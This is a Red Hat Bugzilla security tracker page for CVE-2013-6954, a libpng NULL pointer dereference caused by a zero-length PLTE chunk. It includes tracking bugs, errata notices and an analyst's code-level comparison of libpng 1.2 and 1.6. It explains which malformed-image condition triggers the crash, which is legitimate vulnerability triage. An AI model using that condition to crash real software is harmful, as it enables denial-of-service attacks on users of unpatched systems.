This service will be undergoing maintenance at 00:00 UTC, 2016-08-01. It is expected to last about 1 hours
Bug 1045561 - (CVE-2013-6954) CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette
CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette
Status: CLOSED NOTABUG
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
low Severity low
: ---
: ---
Assigned To: Red Hat Product Security
impact=low,public=20131219,reported=2...
: Security
: CVE-2014-2405 (view as bug list)
Depends On: 1056853 1056854 1056855 1056856 1056857 1056858 1056859 1056860 1056861 1056863 1056864
Blocks: 1045564 1082776
  Show dependency treegraph
 
Reported: 2013-12-20 13:02 EST by Vincent Danen
Modified: 2015-10-15 14:09 EDT (History)
16 users (show)

See Also:
Fixed In Version: libpng 1.6.8
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2014-02-11 00:03:42 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:


Attachments (Terms of Use)
tarball with testcase (296 bytes, application/gzipped-tar)
2014-02-07 12:06 EST, Tristan Matthews
no flags Details

  None (edit)
Description Vincent Danen 2013-12-20 13:02:47 EST
libpng 1.6.8 was released [1] and notes the following fix:

Handle zero-length PLTE chunk or NULL palette with png_error() instead of png_chunk_report(), which by default issues a warning rather than an error, leading to later reading from a NULL pointer (png_ptr->palette) in png_do_expand_palette(). This is CVE-2013-6954 and VU#650142.

The git commit to fix is available [3].

[1] http://sourceforge.net/projects/libpng/files/libpng16/1.6.8/Gnupg/
[2] http://www.kb.cert.org/vuls/id/650142
[3] http://sourceforge.net/p/libpng/code/ci/1faa6ff32c648acfe3cf30a58d31d7aebc24968c
Comment 1 Petr Hracek 2014-01-16 03:53:21 EST
In Fedora we have currently libpng 1.6.8.
https://bugzilla.redhat.com/show_bug.cgi?id=1033049
When the BZ for RHEL7 and older will be created than libpng will be patched.
Comment 7 Huzaifa S. Sidhpurwala 2014-01-22 23:46:08 EST
Created mingw-libpng tracking bugs for this issue:

Affects: fedora-19 [bug 1056858]
Affects: fedora-20 [bug 1056859]
Comment 8 Huzaifa S. Sidhpurwala 2014-01-22 23:46:13 EST
Created mingw32-libpng tracking bugs for this issue:

Affects: epel-all [bug 1056860]
Comment 9 Huzaifa S. Sidhpurwala 2014-01-22 23:46:17 EST
Created libpng tracking bugs for this issue:

Affects: fedora-20 [bug 1056853]
Affects: fedora-19 [bug 1056854]
Comment 10 Huzaifa S. Sidhpurwala 2014-01-22 23:46:21 EST
Created libpng10 tracking bugs for this issue:

Affects: fedora-all [bug 1056857]
Affects: epel-6 [bug 1056861]
Comment 11 Huzaifa S. Sidhpurwala 2014-01-22 23:46:25 EST
Created libpng12 tracking bugs for this issue:

Affects: fedora-all [bug 1056856]
Comment 12 Huzaifa S. Sidhpurwala 2014-01-22 23:46:28 EST
Created libpng15 tracking bugs for this issue:

Affects: fedora-20 [bug 1056855]
Comment 14 Paul Howarth 2014-01-23 08:06:13 EST
Does anyone have a reproducer image for the null/empty palette issues, so I can test a fix for libpng10 (which has slightly different code)?
Comment 17 Fedora Update System 2014-02-06 22:08:54 EST
libpng10-1.0.60-6.fc19 has been pushed to the Fedora 19 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 18 Fedora Update System 2014-02-06 22:09:42 EST
libpng10-1.0.60-6.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 19 Tristan Matthews 2014-02-07 12:06:32 EST
Created attachment 860584 [details]
tarball with testcase

Had to put the file in a tarball as firefox was trying to preview and crashing as expected.
Comment 20 Paul Howarth 2014-02-07 14:24:24 EST
Upstream tells me that only libpng 1.6.1 to 1.6.7 were affected by this issue.

I've just tried an unpatched libpng 1.0.61 with xv, which had no problem loading the testcase image.
Comment 21 Huzaifa S. Sidhpurwala 2014-02-11 00:00:29 EST
Based on the reproducer posted in comment #19, it seems that this issue only affects libpng-1.6. It does not affect older versions of libpng.

Statement:

Not Vulnerable. This issue does not affect the version of libpng as shipped with Red Hat Enterprise Linux 5 and 6.
Comment 22 Fedora Update System 2014-02-24 00:58:08 EST
libpng10-1.0.61-1.el6 has been pushed to the Fedora EPEL 6 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 23 Fedora Update System 2014-04-02 05:26:56 EDT
mingw-libpng-1.6.10-1.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 24 Huzaifa S. Sidhpurwala 2014-04-10 04:21:40 EDT
Analysis:

libgng-1.2:
===========

png_set_PLTE() is called with the values num_palette=0, Later at:

454    if (num_palette < 0 || num_palette > PNG_MAX_PALETTE_LENGTH)

checks the bounds of num_palette, there is no checking for num_palette=0 though.

Then memory is malloced for png_ptr->palette structure at:

 477    png_ptr->palette = (png_colorp)png_calloc(png_ptr,
 478       PNG_MAX_PALETTE_LENGTH * png_sizeof(png_color));

This mallocs 256 * 3 bytes of memory into png_ptr->palette structure, Later at:


 479    png_memcpy(png_ptr->palette, palette, num_palette * png_sizeof(png_color));

Here zero bytes are copied into png_ptr->palette because num_palette = 0, so this memcpy looks like:

png_memcpy(png_ptr->palette, palette, 0)

So png_ptr->palette is filled with 256 * 3 zeros, (due to calloc)

Later when this structure is references in png_do_expand_palette(), the output is zero and there is no crash.


libpng 1.6:
===========

Here in png_set_PLTE() there is a check for num_palette = 0 at:

 523    if ((num_palette > 0 && palette == NULL) ||
 524       (num_palette == 0
 525 #        ifdef PNG_MNG_FEATURES_SUPPORTED
 526             && (png_ptr->mng_features_permitted & PNG_FLAG_MNG_EMPTY_PLTE) == 0
 527 #        endif
 528       ))
 529    {
 530       png_chunk_report(png_ptr, "Invalid palette", PNG_CHUNK_ERROR);
 531       return;
 532    }

So when num_palette is zero, a warning is printed and the function exits, However no memory is malloced for the  png_ptr->palette structure, and its pointing to zero.

Later when its referenced in png_do_expand_palette(), there is a null pointer deref and it crashes.
Comment 25 errata-xmlrpc 2014-04-17 05:30:51 EDT
This issue has been addressed in following products:

  Oracle Java for Red Hat Enterprise Linux 6
  Oracle Java for Red Hat Enterprise Linux 5

Via RHSA-2014:0413 https://rhn.redhat.com/errata/RHSA-2014-0413.html
Comment 26 errata-xmlrpc 2014-04-17 05:33:54 EDT
This issue has been addressed in following products:

  Supplementary for Red Hat Enterprise Linux 6
  Supplementary for Red Hat Enterprise Linux 5

Via RHSA-2014:0412 https://rhn.redhat.com/errata/RHSA-2014-0412.html
Comment 27 Stefan Cornelius 2014-04-17 06:27:23 EDT
OpenJDK upstream commit:
http://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/df3f9871ee6f
Comment 28 errata-xmlrpc 2014-04-17 07:42:04 EDT
This issue has been addressed in following products:

  Oracle Java for Red Hat Enterprise Linux 6
  Oracle Java for Red Hat Enterprise Linux 5

Via RHSA-2014:0414 https://rhn.redhat.com/errata/RHSA-2014-0414.html
Comment 29 errata-xmlrpc 2014-05-13 15:48:13 EDT
This issue has been addressed in following products:

  Supplementary for Red Hat Enterprise Linux 5
  Supplementary for Red Hat Enterprise Linux 6

Via RHSA-2014:0486 https://rhn.redhat.com/errata/RHSA-2014-0486.html
Comment 30 errata-xmlrpc 2014-05-15 13:29:34 EDT
This issue has been addressed in following products:

  Supplementary for Red Hat Enterprise Linux 5
  Supplementary for Red Hat Enterprise Linux 6

Via RHSA-2014:0508 https://rhn.redhat.com/errata/RHSA-2014-0508.html
Comment 31 Tomas Hoger 2014-06-09 05:07:33 EDT
*** Bug 1106391 has been marked as a duplicate of this bug. ***
Comment 32 errata-xmlrpc 2014-06-10 09:12:36 EDT
This issue has been addressed in following products:

  Supplementary for Red Hat Enterprise Linux 7

Via RHSA-2014:0705 https://rhn.redhat.com/errata/RHSA-2014-0705.html
Comment 33 errata-xmlrpc 2014-07-29 11:41:13 EDT
This issue has been addressed in following products:

  Red Hat Network Satellite Server v 5.4
  Red Hat Network Satellite Server v 5.5
  Red Hat Satellite Server v 5.6

Via RHSA-2014:0982 https://rhn.redhat.com/errata/RHSA-2014-0982.html

Note You need to log in before you can comment on or make changes to this bug.